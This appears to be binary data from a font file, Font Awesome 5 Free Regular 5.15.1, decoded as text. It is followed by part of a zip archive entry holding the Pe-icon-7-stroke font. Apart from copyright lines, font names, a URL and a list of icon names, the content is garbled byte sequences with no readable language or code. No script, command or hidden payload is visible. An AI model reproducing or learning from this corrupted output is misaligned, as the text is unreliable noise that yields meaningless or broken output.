p
@��((((T(4((|$${	(

(	��CC_

0����+7%++"=#"=4;54;2327#!"&5463!24#!"3!2`X XX X`��`0��T� XX XX���`��T������2"&4264&"�Α�Α��uu�u��Α���u�uu�����/2"&4264&"6"&462"&462>"'&>2�Α�Α��uu�u��/�/!f��Α���u�uu�c\
99
'����02"&4264&"6"&46262"&42&'&".7�Α�Α��uu�u�so~)R��Α���u�uu�c-m1
����+2"&4264&"6"&46262"&42+"&463�Α�Α��uu�u�s(

�

��Α���u�uu�c-}@�'3?KWco{����2#!"&54634#!"3!2%+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2%+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2� �� ���```�����````b����� �� ���n������'2#!"&546;54;2354;225!3���0(�(*�����`4444�p*������%.=46"&462264&"t�	4�Α���u�uu��e
	�Α�Α��uu�u����'7"=4;2#7#!"&5463!24#!"3!2l�l��`0��T�  ��`��T������#2#!"&5463!%/&?676���`��<�	[			;�		���`�p`���		[	=�			��A�2Y&='.54767675467'".>7676#!"&546;2+"3!2=42�;1+6(-$50I;"��!0<*&>))
���VT"(� 6  )K-;(!9 ����h)A'%
�+`	
��	����
%6&?6764&"2"&4264&"\B�B9ZΑ�Α��uu�u>�B�\�Α���u�uu�����
&732/&6%#!"&5463!24#!"3!2}�ccK��`0��T�cc���`��T������
&%#"&?67#!"&5463!24#!"3!2C�ccu��`0��T�cc�`��T������
&7546&#!"&5463!24#!"3!2�cc��`0��T]�cc��`��T������#!"&546;2'!#"&=#r���.L� h
�^���rLL�� 
h����),5%+"=4;22+"=43%#!"&546;2'3#"&=# ������T�Lh
��T����T<L�� 
h�`����.T\%#*#".#+"&=46;>7>3232>'2654&+4654.#+2;2'>4&"2�3&-E/@

c
-3	$(Kh	
m&%@

���!$*

�
 #	:/45'N)
9

G%�&B"U����.6[%+#".'.'#+"&=46;232>3:32264&"2>54&#6&'6&'6+"#322>54&5�2$$	3-0

@

@	.G-88�]b



@%&m"(�"454/:?	
�
3,$h	
)"B&�#6G

9���(8@H%/"/&?'&4?'&6762767'7''77&2"&4264&"�<G(
+(G<<G(,(G5MM[44[MM[44[�V==V=Q.!!.!�+)G<<F)+)G<<G54[MM[44\MM�=V==Vc!.!!.����&"&463276"3267&5467&j��j	%a>!"$h;VzzV0UT�2*@�Ԗ#(
>$?P9-2�z�z)$mU2T����
&/&?67#!"&5463!24#!"3!2cc���`0��T#�ccE��`��T������"264$2"&42"&4S�uu�u��Α�Α�B//B/�u�uu���Α��/B//B����#/;GYe54;2+"3"=4;2#"=4;2#3"=4;2#+"=4;2"=4;2#!54;463!232%354;23%�((�(�(X(t((L(��@
P
��p(p��,((((`((((T(4((|$$�

�HCC�����7=DJQ#!"&546;2'!#"&=##"''&76767&766>77"6467&'6&7r���.L� h
��

6'.
$
3�N-

x^���rLL�� 
h��D
.0*[�"�
#����R#!"&546;2'!#"&=#32+"'&/+"'.'&6;2476;21676r���.L� h
��


	


	
^���rLL�� 
h�&b		+	H		78	
`b		aa
����B#!"&546;2'!#"&=#2+"'&'+"&?'&6;26763r���.L� h
��#...		^���rLL�� 
h�=N7NN($����6>#!"&546;2'!#"&=#54;2*#+"73264&+r���.L� h
�HE#	
0

^���rLL�� 
h���%
/c����(0#!"&546;2'!#"&=#57676&2"&4r���.L� h
� ((X�((^���rLL�� 
h��@((X��((
����!$1@LP3#7#53#3#57#!"&546;23#"&=##5#7#"&?53322654."7#5�  @    @ ����Lh
0 P�
 
-		@   �      ���&L�� 
h�`�W'a  �

�  ����/=#!"&546;2'!#"&=#/#"&=46;7664'&>.r���.L� h
��$$)
	^���rLL�� 
h��$8$Y

:����7#!"&546;2'!#"&=#6/+"&=46;2r���.L� h
��5hh^���rLL�� 
h�p4%h%����$'0<M7#"/&?67#!"&546;23#"&=#7/&?6&?6/5&?�99!����Lh
��	7		7!99!c66����&L�� 
h�`�	�		�O66����$+"&46227''64&"264''&"67&7gΑ�Α��/p/522�/B//B�5/p/522�58�Α��D5UB//B//p/522�5/p/522�����!6#"/&='.77'76�2<
	p+) r�%%�;�`l���!�|.;T0<�2$��-�	����� '.5#"&'&676326767'7&'7'757/?'#� ^a&'O� ^a&'4_H:'G,4%=/@G�<&
G@]+G'%e:@,O+
b� ^Mb� *N�
*/%L=�4J/}45/J��>J%?4I0==	@�+/;GS_2#!"&546;>32=#!7"=4;2#'3554;2+"754;2+"=4;2+"54;2+"(

�!
+@�`=�lPx���hhhhhh�
��
!
���� ��x``P((��<������8@'&?63!"&54767>57"'675462'&5414&"&53z


��


��>��				.	|"&&%:!;B.&�


�


��0

	
*#D�

,B&7&/.B�`%����42"&4264&"#"&54>32'&#"3276�Α�Α��uu�u3)?=O$@(;&!$*$$
��Α���u�uu�)Q<'@%#	%"2�3K2#!"&5463254#!"37&546'&76&546'&76��`��l�R@AR@=�R@AR@>��� ����V6/.4"%6/.4"%	���+/37;Ocgo#32+"=!+"=4;#"=4;2!54;2'35!355#!5#'#"=!+32!543'2+"=#"=4;2'355#+�H��HH@H@ �@  � ��@�T���`8L@�HHHH@    ��    @���4�4pp�pL
��@�CGKOSgk���%#32+"=#+"=4;5#+"=4;5#"=4;2354;2+354;2'35355#5#354;5#"=#+325#%5#"=#32+"=#3235435#5#4H�HXHH�HXH�   ��   @��� 8XHX�4   �HHH�HHH�  �       ����  @�XH@    ����%#!"&5463!27#!3546;�T��`�LLP���
hdT`��L��h
���(42+#!"&546;54632=#"&=#"3%254#!"3�0��0��*������0@0�0*���`4������%+132#!"=4;467.5#"=43!2#!2654&"p2//2��2//2h��KjKKjK�?ss??ss?LllL�`LllL���)q6+"&5<&4&/&=46>62654&+"&=4&+"&=4&+"&=4&#"/&=4&354?6�$C	+
�
b'8#I$@:H						a�+q,(rd	!

U"49#,)(
�r

		

		(
)		

t)

9U
d������Y6+"/&676546>654&+"&=4&+"&=4&+"&=4&/.376u.�
w!3 P4			

	
s�O)��
�7~!($%)!ф


L		�
�		�
�		�
�	&	�w��� ]"&7.7#"&463'.>6#'32?6=4/&#"/&+";2+";2#""(
X++^O8�+1b"wFFw	b
�
�
	��		

		

 6 
#+<+	88857'�%0�7@	;

			��@�A%#5'&+"&546;7#"&=463!254/&#!";2+";2-�d�!4$r�!/!&'v�
��
�	r�

c�$|H&!$40/!!!��L�
@	'���.a+"/&5476'&5467&54>767>3266&&?6&"/././&;267�:
E-k=,\('&)+ /+ $
	4
[*k+L	�*8*V R
*
6"	Rh
��

��iz"$0V#������^p��6+"/&676546266&;2?6=4&+"&=4&+".=4&+"&=4&'546;2+"&7546;2+"&754;2+"f!9%�"m!'7'!-��m	�			DL		K
(#Tw�7�''J
w

�wT

	

	#

#	�

�	R`		`	`		`		``������#^6+"/&7'&676'462654&+"&=4&+"&=4&+"/.;2?6j(%�'758%	+<+#0			

;@7�#Fw"b1+�8O^++X�F

		

		��	
��
b	w����,52"&4264&"+"/#+"&=46;2'254.+�Α�Α��uu�u6+0 'Of(: ��Α���u�uu�#ZT�U3)!

@����;C%++"=#"=4;54;2327#!"&546;54;2354;232!3!2PLLLLp��0(�(00��T�LLLL���`4444��*������+37"=4;2#7#!"&546;54;2354;232!3!2|�|��0(�(00��Tx��`4444��*������;C%//&?'&?6767#!"&546;54;2354;232!3!28	66	66	66	66���0(�(00��TI66	66	66	66���`4444��*������'72#!"&546;54;2354;225!3%/&?676���0(�(*���	K			,o		���`4444�p*��Ɏ	K	-n			��@�!&+2#"/#"&54?6327673#0
�



��
�



����������	��5=?	Z5=?:��.��/,�!/�����*2+#"=#"&54634&#!";?326�&&�}`&&�	��		�C
�	�&��&^T& &�� 		��	<2
	����/2"&4264&"%+"&=46;2+"&=46;2�Α�Α��uu�u(	0		0	p	0		0	��Α���u�uu���		�		�		�		����"&462264&"+"&=46;2��Α���u�uu��	�		�	'Α�Α��uu�ux�		�		����#+Lfn3#"&5#'#"'&/#+376;2264&"6/&'&6?#"##36???5#'&+"6?6264&"y@
:#;U			@v0��Q			�l	-	'9>*a!
%		�-=TA7
gn			@�

 	L		0��

		
W	;#>�X

 
$I�><3
S0

		
���5`#!"&54767>254'&'"."#3!2'#".'&'&?6232>7676��`(_dQ4/V� 
7
7
	7

7	��!K
	O���B)
	%F��
-

-
	,


,	����'+3H#32+32+#!"&5463!232!6"&462"&=463232632#���@P���4&&4&�	
''
	 @(@(0�0(����`�&4&&4�""��@�0<HT2#!"&5463!6"&462"&=463232632#7"=4;2#'"=4;2#'"=4;2#� � �4&&4&�	
''
	>ppppp���`�p`���&4&&4�""@@@����"42"&4264&"&2"&427&'#"'%654&"6322632�P88P8L((7Α�Α��8.-%%u�u%)@%$%@X8P88PX((ԑΑ���0&

'$4@SuuS@44

����'<2#!"&5463!"&46;2#"&462"&=463232632#P�� ��`		`		4&&4&�	
''
	��`��0��``				�&4&&4�""��@�$0<HP2#!"&5463!3&54632326327"=4;2#'"=4;2#'"=4;2#"&462� � !''9ppppp�4&&4&���`�p ��""P@@`&4&&4���2#!"&54635!3!2��`��`����`�v���� !"&463!2�@

�
 ���&2+#!"&546;54635!%!32�0��0��������0@0�0��`@0��������%/&//+"&=/&4?5/.?&/&?'.?>7'&/&6?'&?6'&6?65'&?6546;276?>76/76�'	H;		:H	'
'"PHHP"''	H:		:H	(
'"PHHP"]"Q*T;.		.<T*Q#	**	"Q*T;.		.<T*Q#	**	����-59E%"=4;2#2+#!"&5#"&=46;76;2'3'&+"!7"=4;2#�		��		R"d"��^��L ��P		��P		99�`P��0����@�$4<G%#!"&546;#"3!2=!"3!2=452#!"&5463"&4627676!���
tZ��t��x""1((hH�� 0�
P��0�_""�((hHP����12#!"&546;462&"2644++"=#"3!2P��P&4&6x*�*���`&&�lT$$������"2"&4264&"74;232/&6;�Α�Α��uu�u�(CddC��Α���u�uu��tdd����"6462"$4&"27+/&?632�Α��/u�uu�-tddtYΑ�Α��uu�u�(CddC����""&462264&"54;546&=#"��Α���u�uu�-tddt'Α�Α��uu�u�(CddC����""&462"264#"=#"&?6+gΑ�Α��uu�u�(CddC8�Α��/u�uu��tddt����C�!$2"'&?63#3%3'#37'377#�d����dM94D��4�4�?D4dxD3aax4����U�0``````�������%5E2"&454+54+"327#";22#!"&54635"&5!#2!46P88P8�@�

��

0%�`%%�%0B\BB\fX
7
��

@
��%%�%%���72#!"&54634#!"3!2'//&?'&?676��`��l�l==			==			==			==		���`�vT���==			==			==			==		�����+>62"&462"&462"&4&2#"'#"&7>7&54264&"6?����Ԗ�j/.AJ
5Vzz�z(
&��z�z.%8FV�^�^^B3*

����'92"&4264&"$"'&>276&"&46272/&"&7>�Α�Α��uu�u6/�/!f!��%
&	��Α���u�uu�$
99
''A)				
���� 3H2"&4264&"62&'&".?"&547'.>6"&5"'&>?6�Α�Α��uu�u�j">'	

P	
�
	P
��Α���u�uu�)
q

	

@	

	����+GO2"&4264&"6"/"&4?'&4627626"/"&4?'&462762"&4�Α�Α��uu�u���4&&4&��Α���u�uu�kL�&4&&4	����'/7?K2"&4264&"$2"&4264&"62"&4&"&462264&"62"&42+"&463�Α�Α��uu�uB//B/<((&X/B//B5((&�

�

��Α���u�uu��/B//BQ((,B//B/�((,�����-2"&4264&"6"&46:"&42'&"&76�Α�Α��uu�u��N<=
	141	
��Α���u�uu��]"		
����/6=AEIMT[2"&4264&"6"&462"&4622+"&=4635#375#"5#75#5#75#5#326=4&+�Α�Α��uu�u���(		h000p000h(		��Α���u�uu�c#  `	(	((((		����'/2"&4264&"%6#".'&62&"&462"&462�Α�Α��uu�u2M)6()�����Α���u�uu�"
".&

N����
#+97"'&'6762"'&'6762&2"&4264&"%6"&'&62�q�Α�Α��uu�u2MRM)��		""		""		""		""ڑΑ���u�uu�"
".."

����4E2"&4264&"%6#".'&62'&7>32/&"7&7>2/&"�Α�Α��uu�u2M)6()��#
	
&
	�#&#
	
&
	��Α���u�uu�"
".&

V)))����
+EZ"&5476".'&62766/&"'&7>27"&4632&#"2654'2$"'&7>32/�,..�6')�)M`
	
&
	#&#d�Α�gC:2:Suu�u��&
	#
	 "EE��%


".�)),%(g��Α" u�uuS!)����
4<D%6"&'&62/.7>7>7/&67676&2"&4264&"bMRM)�pF�F	
�Α�Α��uu�u�
".."

>
FDF	
��Α���u�uu�����,:2"&4264&"%6#".'&62.?'&63'&4?6�Α�Α��uu�u2M)6()��
!!PP�PP	!!
��Α���u�uu�"
".&

/((0000((�����/;JYh76"&4767&67632&#"%67#"'67327>'&76762+&/.?"'&?6367>'&676u/")7Hg<5/6S:.{$9Ig30)-S:1C/"��
	
4

Z4	

4

&.:T&@R"/6D�6I;-�E�9I;0�TR"/s
Z	
4Z	
4p/%T:����6P2"&4264&"%6"&'&62'7'&6?62/&%/&?'&6?62�Α�Α��uu�u2MRM)��#
##
��Α���u�uu�"
".."

G#		#N	##	������%5CTi76"&476"'&'&6"&'6726%&>2&.""&'&62766/&"'&7>2&"'&7>32/u/"M"/Rl#l~l#_r_��'Em~mE&p�p�RM)�)
	
&
	#&#�&
	#
	�R"//"RP 2;;2 1;;�>f;;f?	H``�."


"|))")����;CK2"&45'&"/.32>>54&"&=&'&6276&2"&462"&4�Α�Α8%1;u�u;1)�)����Α��,		+'_9SuuS9_,


,�����;HU2"&45'&"/.32>>54&"&=&'&6276/&4?&?'&6�Α�Α8%1;u�u;1)�)!!
	PP�P	
!!��Α��,		+'_9SuuS9_,


,((0000((����!)1Ge2/&"&7>2"&4264&"62"&4&2"&45'&"/.32>>54&"&=&'&6276�

&
%�B//B/<((&�Α�Α8%1;u�u;1)�)
					4/B//BQ((,��Α��,		+'_9SuuS9_,


,����%-52/&"&76"&4626"&'&622"&4264&"4(%
&
Z�MRM)��Α�Α��uu�u						$T
".."

6�Α���u�uu�����)19A2"&4#"'&?64/&4?64/&762"&4264&"$2"&4��##)�Α�Α��uu�uq				%�Α���u�uu������#EU2/&"&7>&2"&4264&"%#"'&?64/&4?64/&7662/&"&76�#
&
	
Α�Α��uu�u##)&#
&
	
()��Α���u�uu�				�)����!4<Ol%#"'&?64/&4?64/&7637&"&7>32'&462"/&>7676#"&4632&#&'654&"320##)F&

%�ZS
�/4g��gg�
u�uuS-�					L

		�!	S	1(�Α�g.,
 Suu�u����-2"&464&"6"&462"&4622+"&'&63�Α�ΑKuu�uu���E..E��Α���u�uu�u�S	-<<-	����/=2"&464&"2/&"&76&7>2/&"2+"&'&63�Α�ΑKuu�uu�&#
&
	
�
#&#	
&
�E..E��Α���u�uu�u0)#))M	-<<-	����)72"&464&"/&4?6&?'&62+"&'&63�Α�ΑKuu�uu�!PP�	
!!P�E..E��Α���u�uu�u(00b((0R	-<<-	����!)72"&464&"2/&"&7>"&4622+"&'&63�Α�ΑKuu�uu�
&	l�E..E��Α���u�uu�u$
				2S	-<<-	����2"&4264&"62"&462"&4�Α�Α��uu�uk���Α���u�uu������)1CO2"&4264&"$2"&42654'"&547&"&4622654'"&5472+"&463�Α�Α��uu�u<**<*7"@*<**<F"�

�

��Α���u�uu��*<**<F

/<**<*H

�����!3CK2"&4654&"5462275462&/&"&7>3262/&"&762"&4�Α�Α�8u�u8-f-�	&

%p(%
&
>.!!.!��Α���:PSuuSP:r

��

2						
*				D&4&&4����&.92"&4264&"72&'&#"&46&"&46262"&46"&54�Α�Α��uu�u�<&&
As�$"��Α���u�uu�#.@-P1����4E2"&4264&"%>"'&>2''&7>32/&"62/&"'&76�Α�Α��uu�u/�/!f�	#
	
&�&#
	
&
	��Α���u�uu�
99
'�)%)����'2"&4264&"62"&46"&46:"&4�Α�Α��uu�u�4&&4&���Α���u�uu�;&4&&4{����)82"&4264&"$/&4?&?'&62'&".76�Α�Α��uu�uC
!!
	PP�P	
!!PHC
#r#��Α���u�uu��((0030((0J6'	
'V6��"^&�!
,��1U���	4	6Q	�	D�	6&	Lz	0�	
X:	.�	&		E	6]	&�	�Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Free RegularFont Awesome 5 Free RegularRegularRegularFont Awesome 5 Free Regular-5.15.1Font Awesome 5 Free Regular-5.15.1Font Awesome 5 Free RegularFont Awesome 5 Free Regular331.521 (Font Awesome version: 5.15.1)331.521 (Font Awesome version: 5.15.1)FontAwesome5Free-RegularFontAwesome5Free-RegularThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 FreeFont Awesome 5 FreeRegularRegularFont Awesome 5 Free RegularFont Awesome 5 Free RegularFont Awesome 5 FreeFont Awesome 5 FreeRegularRegular���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ�KLMNOPQRSTUVW�XYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������heartstaruserclocklist-altflagbookmarkimageedittimes-circlecheck-circlequestion-circleeye	eye-slashcalendar-altcommentfolderfolder-open	chart-barcomments	star-halflemoncredit-cardhddhand-point-righthand-point-left
hand-point-uphand-point-downcopysavesquareenvelope	lightbulbbellhospitalplus-squarecirclesmilefrownmehkeyboardcalendarplay-circleminus-squarecheck-squareshare-squarecompasscaret-square-downcaret-square-upcaret-square-rightfilefile-alt	thumbs-upthumbs-downsunmooncaret-square-left
dot-circlebuildingfile-pdf	file-word
file-excelfile-powerpoint
file-imagefile-archive
file-audio
file-video	file-code	life-ringpaper-planefutbol	newspaper
bell-slashclosed-captioningobject-groupobject-ungroupsticky-noteclone	hourglass	hand-rock
hand-paper
hand-scissorshand-lizard
hand-spockhand-pointer
hand-peace
calendar-pluscalendar-minuscalendar-timescalendar-checkmapcomment-altpause-circlestop-circle	handshake
envelope-openaddress-bookaddress-carduser-circleid-badgeid-cardwindow-maximizewindow-minimizewindow-restore	snowflake	trash-altimages	clipboardarrow-alt-circle-downarrow-alt-circle-leftarrow-alt-circle-rightarrow-alt-circle-upgemmoney-bill-altwindow-closecomment-dots
smile-winkangrydizzyflushed
frown-opengrimacegringrin-alt	grin-beamgrin-beam-sweatgrin-heartsgrin-squintgrin-squint-tears
grin-stars
grin-tearsgrin-tonguegrin-tongue-squintgrin-tongue-wink	grin-winkkiss	kiss-beamkiss-wink-heartlaugh
laugh-beamlaugh-squint
laugh-wink	meh-blankmeh-rolling-eyessad-crysad-tear
smile-beamsurprisetired������۠�@۠�EPK!87}p�p�flex/fonts/Pe-icon-7-stroke.ttfnu&1i��0OS/2"��`cmapU� LgasphglyfƳ>�p��headE	��d6hhea��ݜ$hmtx}~�8loca��b��maxp��� namevͫ���post�P �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
